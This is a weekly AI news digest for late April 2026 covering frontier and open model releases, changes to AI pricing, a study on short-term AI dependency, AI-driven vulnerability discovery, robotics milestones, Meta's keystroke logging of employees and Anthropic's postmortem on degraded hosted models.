April 26, 2026

Week 17, 2026

Papers, releases, and things you might have missed.

GPT-5.5, DeepSeek V4, Kimi K2.6, and Xiaomi MiMo V2.5 Pro all shipped within four days. Same week, Qwen released a small open-source coding model that performs roughly as well as the best paid models did a year ago, and runs on a laptop.

GitHub paused new Copilot Individual signups and is moving to token-based billing. Anthropic ran a brief A/B test pulling Claude Code from the $20 Pro tier. Meta announced it will record employees’ keystrokes and mouse activity to train its agents, the same week it laid off 8,000 staff and committed $115–135B to AI infrastructure. Anthropic published a postmortem confirming three months of silent degradation in hosted Claude models. Sony’s table-tennis robot beat ITTF players in a Nature cover paper. Mozilla patched 271 Firefox bugs found by Anthropic’s Mythos preview.


The Open Frontier Caught Up to the Closed Frontier

Anthropic released Claude Opus 4.7 on April 16. OpenAI released GPT-5.5 seven days later, scoring 82.7% on a major coding benchmark. The widely-quoted “Senior Engineer Benchmark” headline number, it turns out, is what you get when Opus 4.7 and GPT-5.5 work together as a pipeline — one plans, the other executes — not GPT-5.5 alone. DeepSeek V4 shipped April 24, freely downloadable under an MIT license. Kimi K2.6 is now the top-ranked open-source model on the Artificial Analysis index, sitting just behind the proprietary flagships from Anthropic, Google, and OpenAI. Xiaomi’s MiMo V2.5 Pro filled the rest of the week.

The more important release calendar may have been the open one. Llama 4 Scout shipped earlier this month with the largest context window of any model, open or closed — large enough to fit a year of email threads or an entire codebase in a single prompt. Gemma 4 is freely licensed and handles images, video, and audio alongside text. Alibaba’s Qwen3.6-27B matches what the leading paid coding models could do a year ago, while staying small enough to run on a laptop. PrismML Bonsai compresses an 8-billion-parameter model down to 1.15 GB — about the size of a movie — for phones and other small devices.

The supply-side story is no longer hypothetical. Cursor admitted this week that its new Composer 2 model is built on top of Kimi K2.5, only disclosed after users found Moonshot’s model ID in the code. A major Western coding tool’s flagship model is a Chinese open-weights base.

Picking a model is no longer a once-a-year decision. The cheapest near-frontier option is increasingly an open-source one you run yourself, or that the tool you’re paying for is already running for you under the hood.


Flat-Rate AI Pricing Is Breaking

GitHub paused new Copilot Individual signups on April 20 after weekly operating costs reportedly doubled. Internal documents say Copilot users will be moved to token-based billing starting in June. Anthropic ran a brief A/B test removing Claude Code from the $20 Pro plan. About 2% of new signups, reverted same day, but the test happened.

The math behind it is simple. AI agents now string together about twenty tool calls per task and run for hours. A single autonomous coding session can use more compute than an entire week of chat. Flat-rate plans subsidized chat. They don’t subsidize agents.

Pair this with the open-source wave above. As flat-rate prices rise toward what these workloads actually cost, the question for any team with the infrastructure to run a model themselves becomes whether to pay $200 per seat per month for metered access, or run something like Qwen on hardware they already have. The economics now favor the second answer in more cases than they did a month ago.


A Controlled Study Quantified Short-Term AI Dependency

Researchers at CMU, Oxford, MIT, and UCLA ran an experiment with 1,222 people. The setup was straightforward: some participants got AI help on math reasoning and reading comprehension tasks for about ten minutes; others worked through the same material without it. When researchers then took the AI away, the people who’d just used it performed worse on the next round of problems than the people who’d never had AI in the first place. They also gave up more often on hard questions. The authors think AI conditions people to expect instant answers, which makes them less willing to push through difficulty on their own.

Two adjacent papers shipped this week: The LLM Fallacy gives a name to people mistaking AI-generated output for their own skill, and Agentivism proposes a teaching framework specifically aimed at countering cognitive atrophy from AI overreliance.

This continues a thread that opened a month ago: Wharton’s “cognitive surrender” finding (80% of people follow AI answers even when those answers are wrong), and Stanford’s work on AI models telling users what they want to hear rather than what’s true. But this week’s evidence is sharper. The earlier studies asked people about their own habits. This one measures performance directly, after just ten minutes.


Defenders Are Responding to AI Vulnerability Finders

Mozilla patched 271 Firefox vulnerabilities found by Anthropic’s unreleased Mythos preview model — twelve times what Opus 4.6 turned up on the same browser. Mythos’s headline 27-year-old vulnerability was in core internet networking code in OpenBSD, not Firefox; same evaluation, separate target. The UK’s AI Safety Institute confirmed Mythos completed an autonomous 32-step cyber-attack simulation in 3 of 10 attempts.

What’s new this week is the defender response. OpenAI launched GPT-5.4-Cyber for defensive security work on April 14, then announced a $25K bug bounty for anyone who can find a single prompt that gets GPT-5.5 to ignore its biosecurity filters across multiple test questions. Meanwhile, researchers at UC Santa Barbara found that 9 of 428 third-party services that sit between apps and AI models are actively slipping malicious code into the responses they pass back. Most teams aren’t even checking that layer.

The same AI capability that finds 27-year-old bugs is also the most scalable attack tool ever built. And if your app talks to AI through a middleman service, that middleman is now part of your security perimeter whether you’ve checked it or not.


Three Narrow Physical Benchmarks Fell to Machines

Sony’s “Ace” robot beat elite human table-tennis players in official sanctioned matches, a Nature cover paper on April 23. The robot reacts to the ball in about 20 milliseconds, tracking spin rates over 9,000 RPM. Honor’s Lightning humanoid completed the Beijing E-Town half-marathon in 50:26 on April 19, faster than the human world record of about 57 minutes.

These are narrow tests under controlled or semi-controlled conditions. They are also competition-grade performances under official rules. The assumption that physical tasks are the last thing humans will outperform machines at took two visible hits in a single week.


Meta Will Record Employees’ Keystrokes to Train Its Agents

Meta announced on April 21 it will record keystrokes and mouse activity on remaining staff to generate training data for its agents. Same week: 8,000 layoffs, about 10% of the workforce, and a 2026 spending plan of $115–135 billion on AI infrastructure.

The data and the layoffs are part of one pipeline. Cut humans, capture the work patterns of the survivors, train agents on those patterns. Microsoft’s first-ever buyouts and Google’s claim that 75% of new code is AI-generated are part of the same broader story, but those numbers have been accumulating for a month. The keystroke-logging announcement is the new beat: surveillance as agent-training methodology, on the record, at one of the world’s largest employers.

It used to be the dystopian-corner-case example. Now it’s a published HR policy.


Silent Model Degradation Becomes a Backlash Trigger

Anthropic published a postmortem on April 23 confirming that three separate changes between March and April caused noticeable degradation in hosted Claude models, and that the cause was hidden from users for weeks. The postmortem itself is detailed and unusual. Most providers don’t publish at this level. But it lands inside a broader pattern.

Stanford’s AI Index 2026 — the major annual snapshot of the field — shipped this week. The score the index gives major AI companies for transparency about their own models dropped from an average of 58 (out of 100) to 40 in one year. Meta went from 60 to 31. Mistral went from 55 to 18. Google, Anthropic, and OpenAI have all stopped disclosing how much data they trained on or how long the training took for their latest models. The report’s own phrasing: “the most capable models now disclose the least.”

The EU’s AI Act transparency rules are scheduled to take effect in August 2026. The EU is simultaneously proposing to push the harder compliance deadlines to December 2027. Two regulatory signals heading in opposite directions, while the model behind your API quietly changes.

For anyone building on top of these models, “the model you’re using is not the model that was announced” is now something teams need to actively budget time and money to monitor.


Worth Your Time

  • MCP at 97 million installs a month. MCP — the Model Context Protocol — is the standard way AI models connect to outside tools, files, and services. Anthropic donated it to a new Linux-Foundation-hosted body whose founding members include Block, OpenAI, Google, Microsoft, AWS, and Cloudflare. From around 2 million installs at launch in November 2024 to 97 million a month by March 2026 — roughly the speed at which React took over web development.
  • An AI-written paper made it through peer review at ICLR. Sakana AI’s autonomous paper-writing system, AI Scientist-v2, had a paper accepted at a workshop at one of the field’s major conferences, with reviewer scores above the acceptance threshold. Sakana withdrew the paper before final publication, but the acceptance itself stands as the milestone.
  • Tufts robotics research (to be presented at the major robotics conference ICRA in June). A robot using a hybrid system that combines neural networks with rule-based reasoning hit 95% task success on a planning benchmark. A standard neural-network-only baseline scored 34% on the same task — using a hundred times more training energy. The “all you need is more compute” assumption gets harder to defend with that kind of efficiency gap.
  • MIT’s “Crashing Waves vs. Rising Tides” study. Based on more than 17,000 worker evaluations: no sudden displacement, just gradual expansion of what AI can handle. AI hit 65% success on tasks that take humans three to four hours — up from about 50% the year before. Current numbers are likely higher; the study’s measurement window closed in mid-2025.
  • Vercel credential breach traced to a Roblox cheat. A Context.ai employee downloaded malware hidden in a Roblox cheat tool. The attacker used the stolen login tokens to extract limited customer environment variables from Vercel. A supply-chain credential theft that started with a personal device, not a platform outage.
  • Deezer: 44% of daily uploads are AI-generated. Up from essentially nothing two years ago. The ratio is the story; absolute volume hasn’t been disclosed.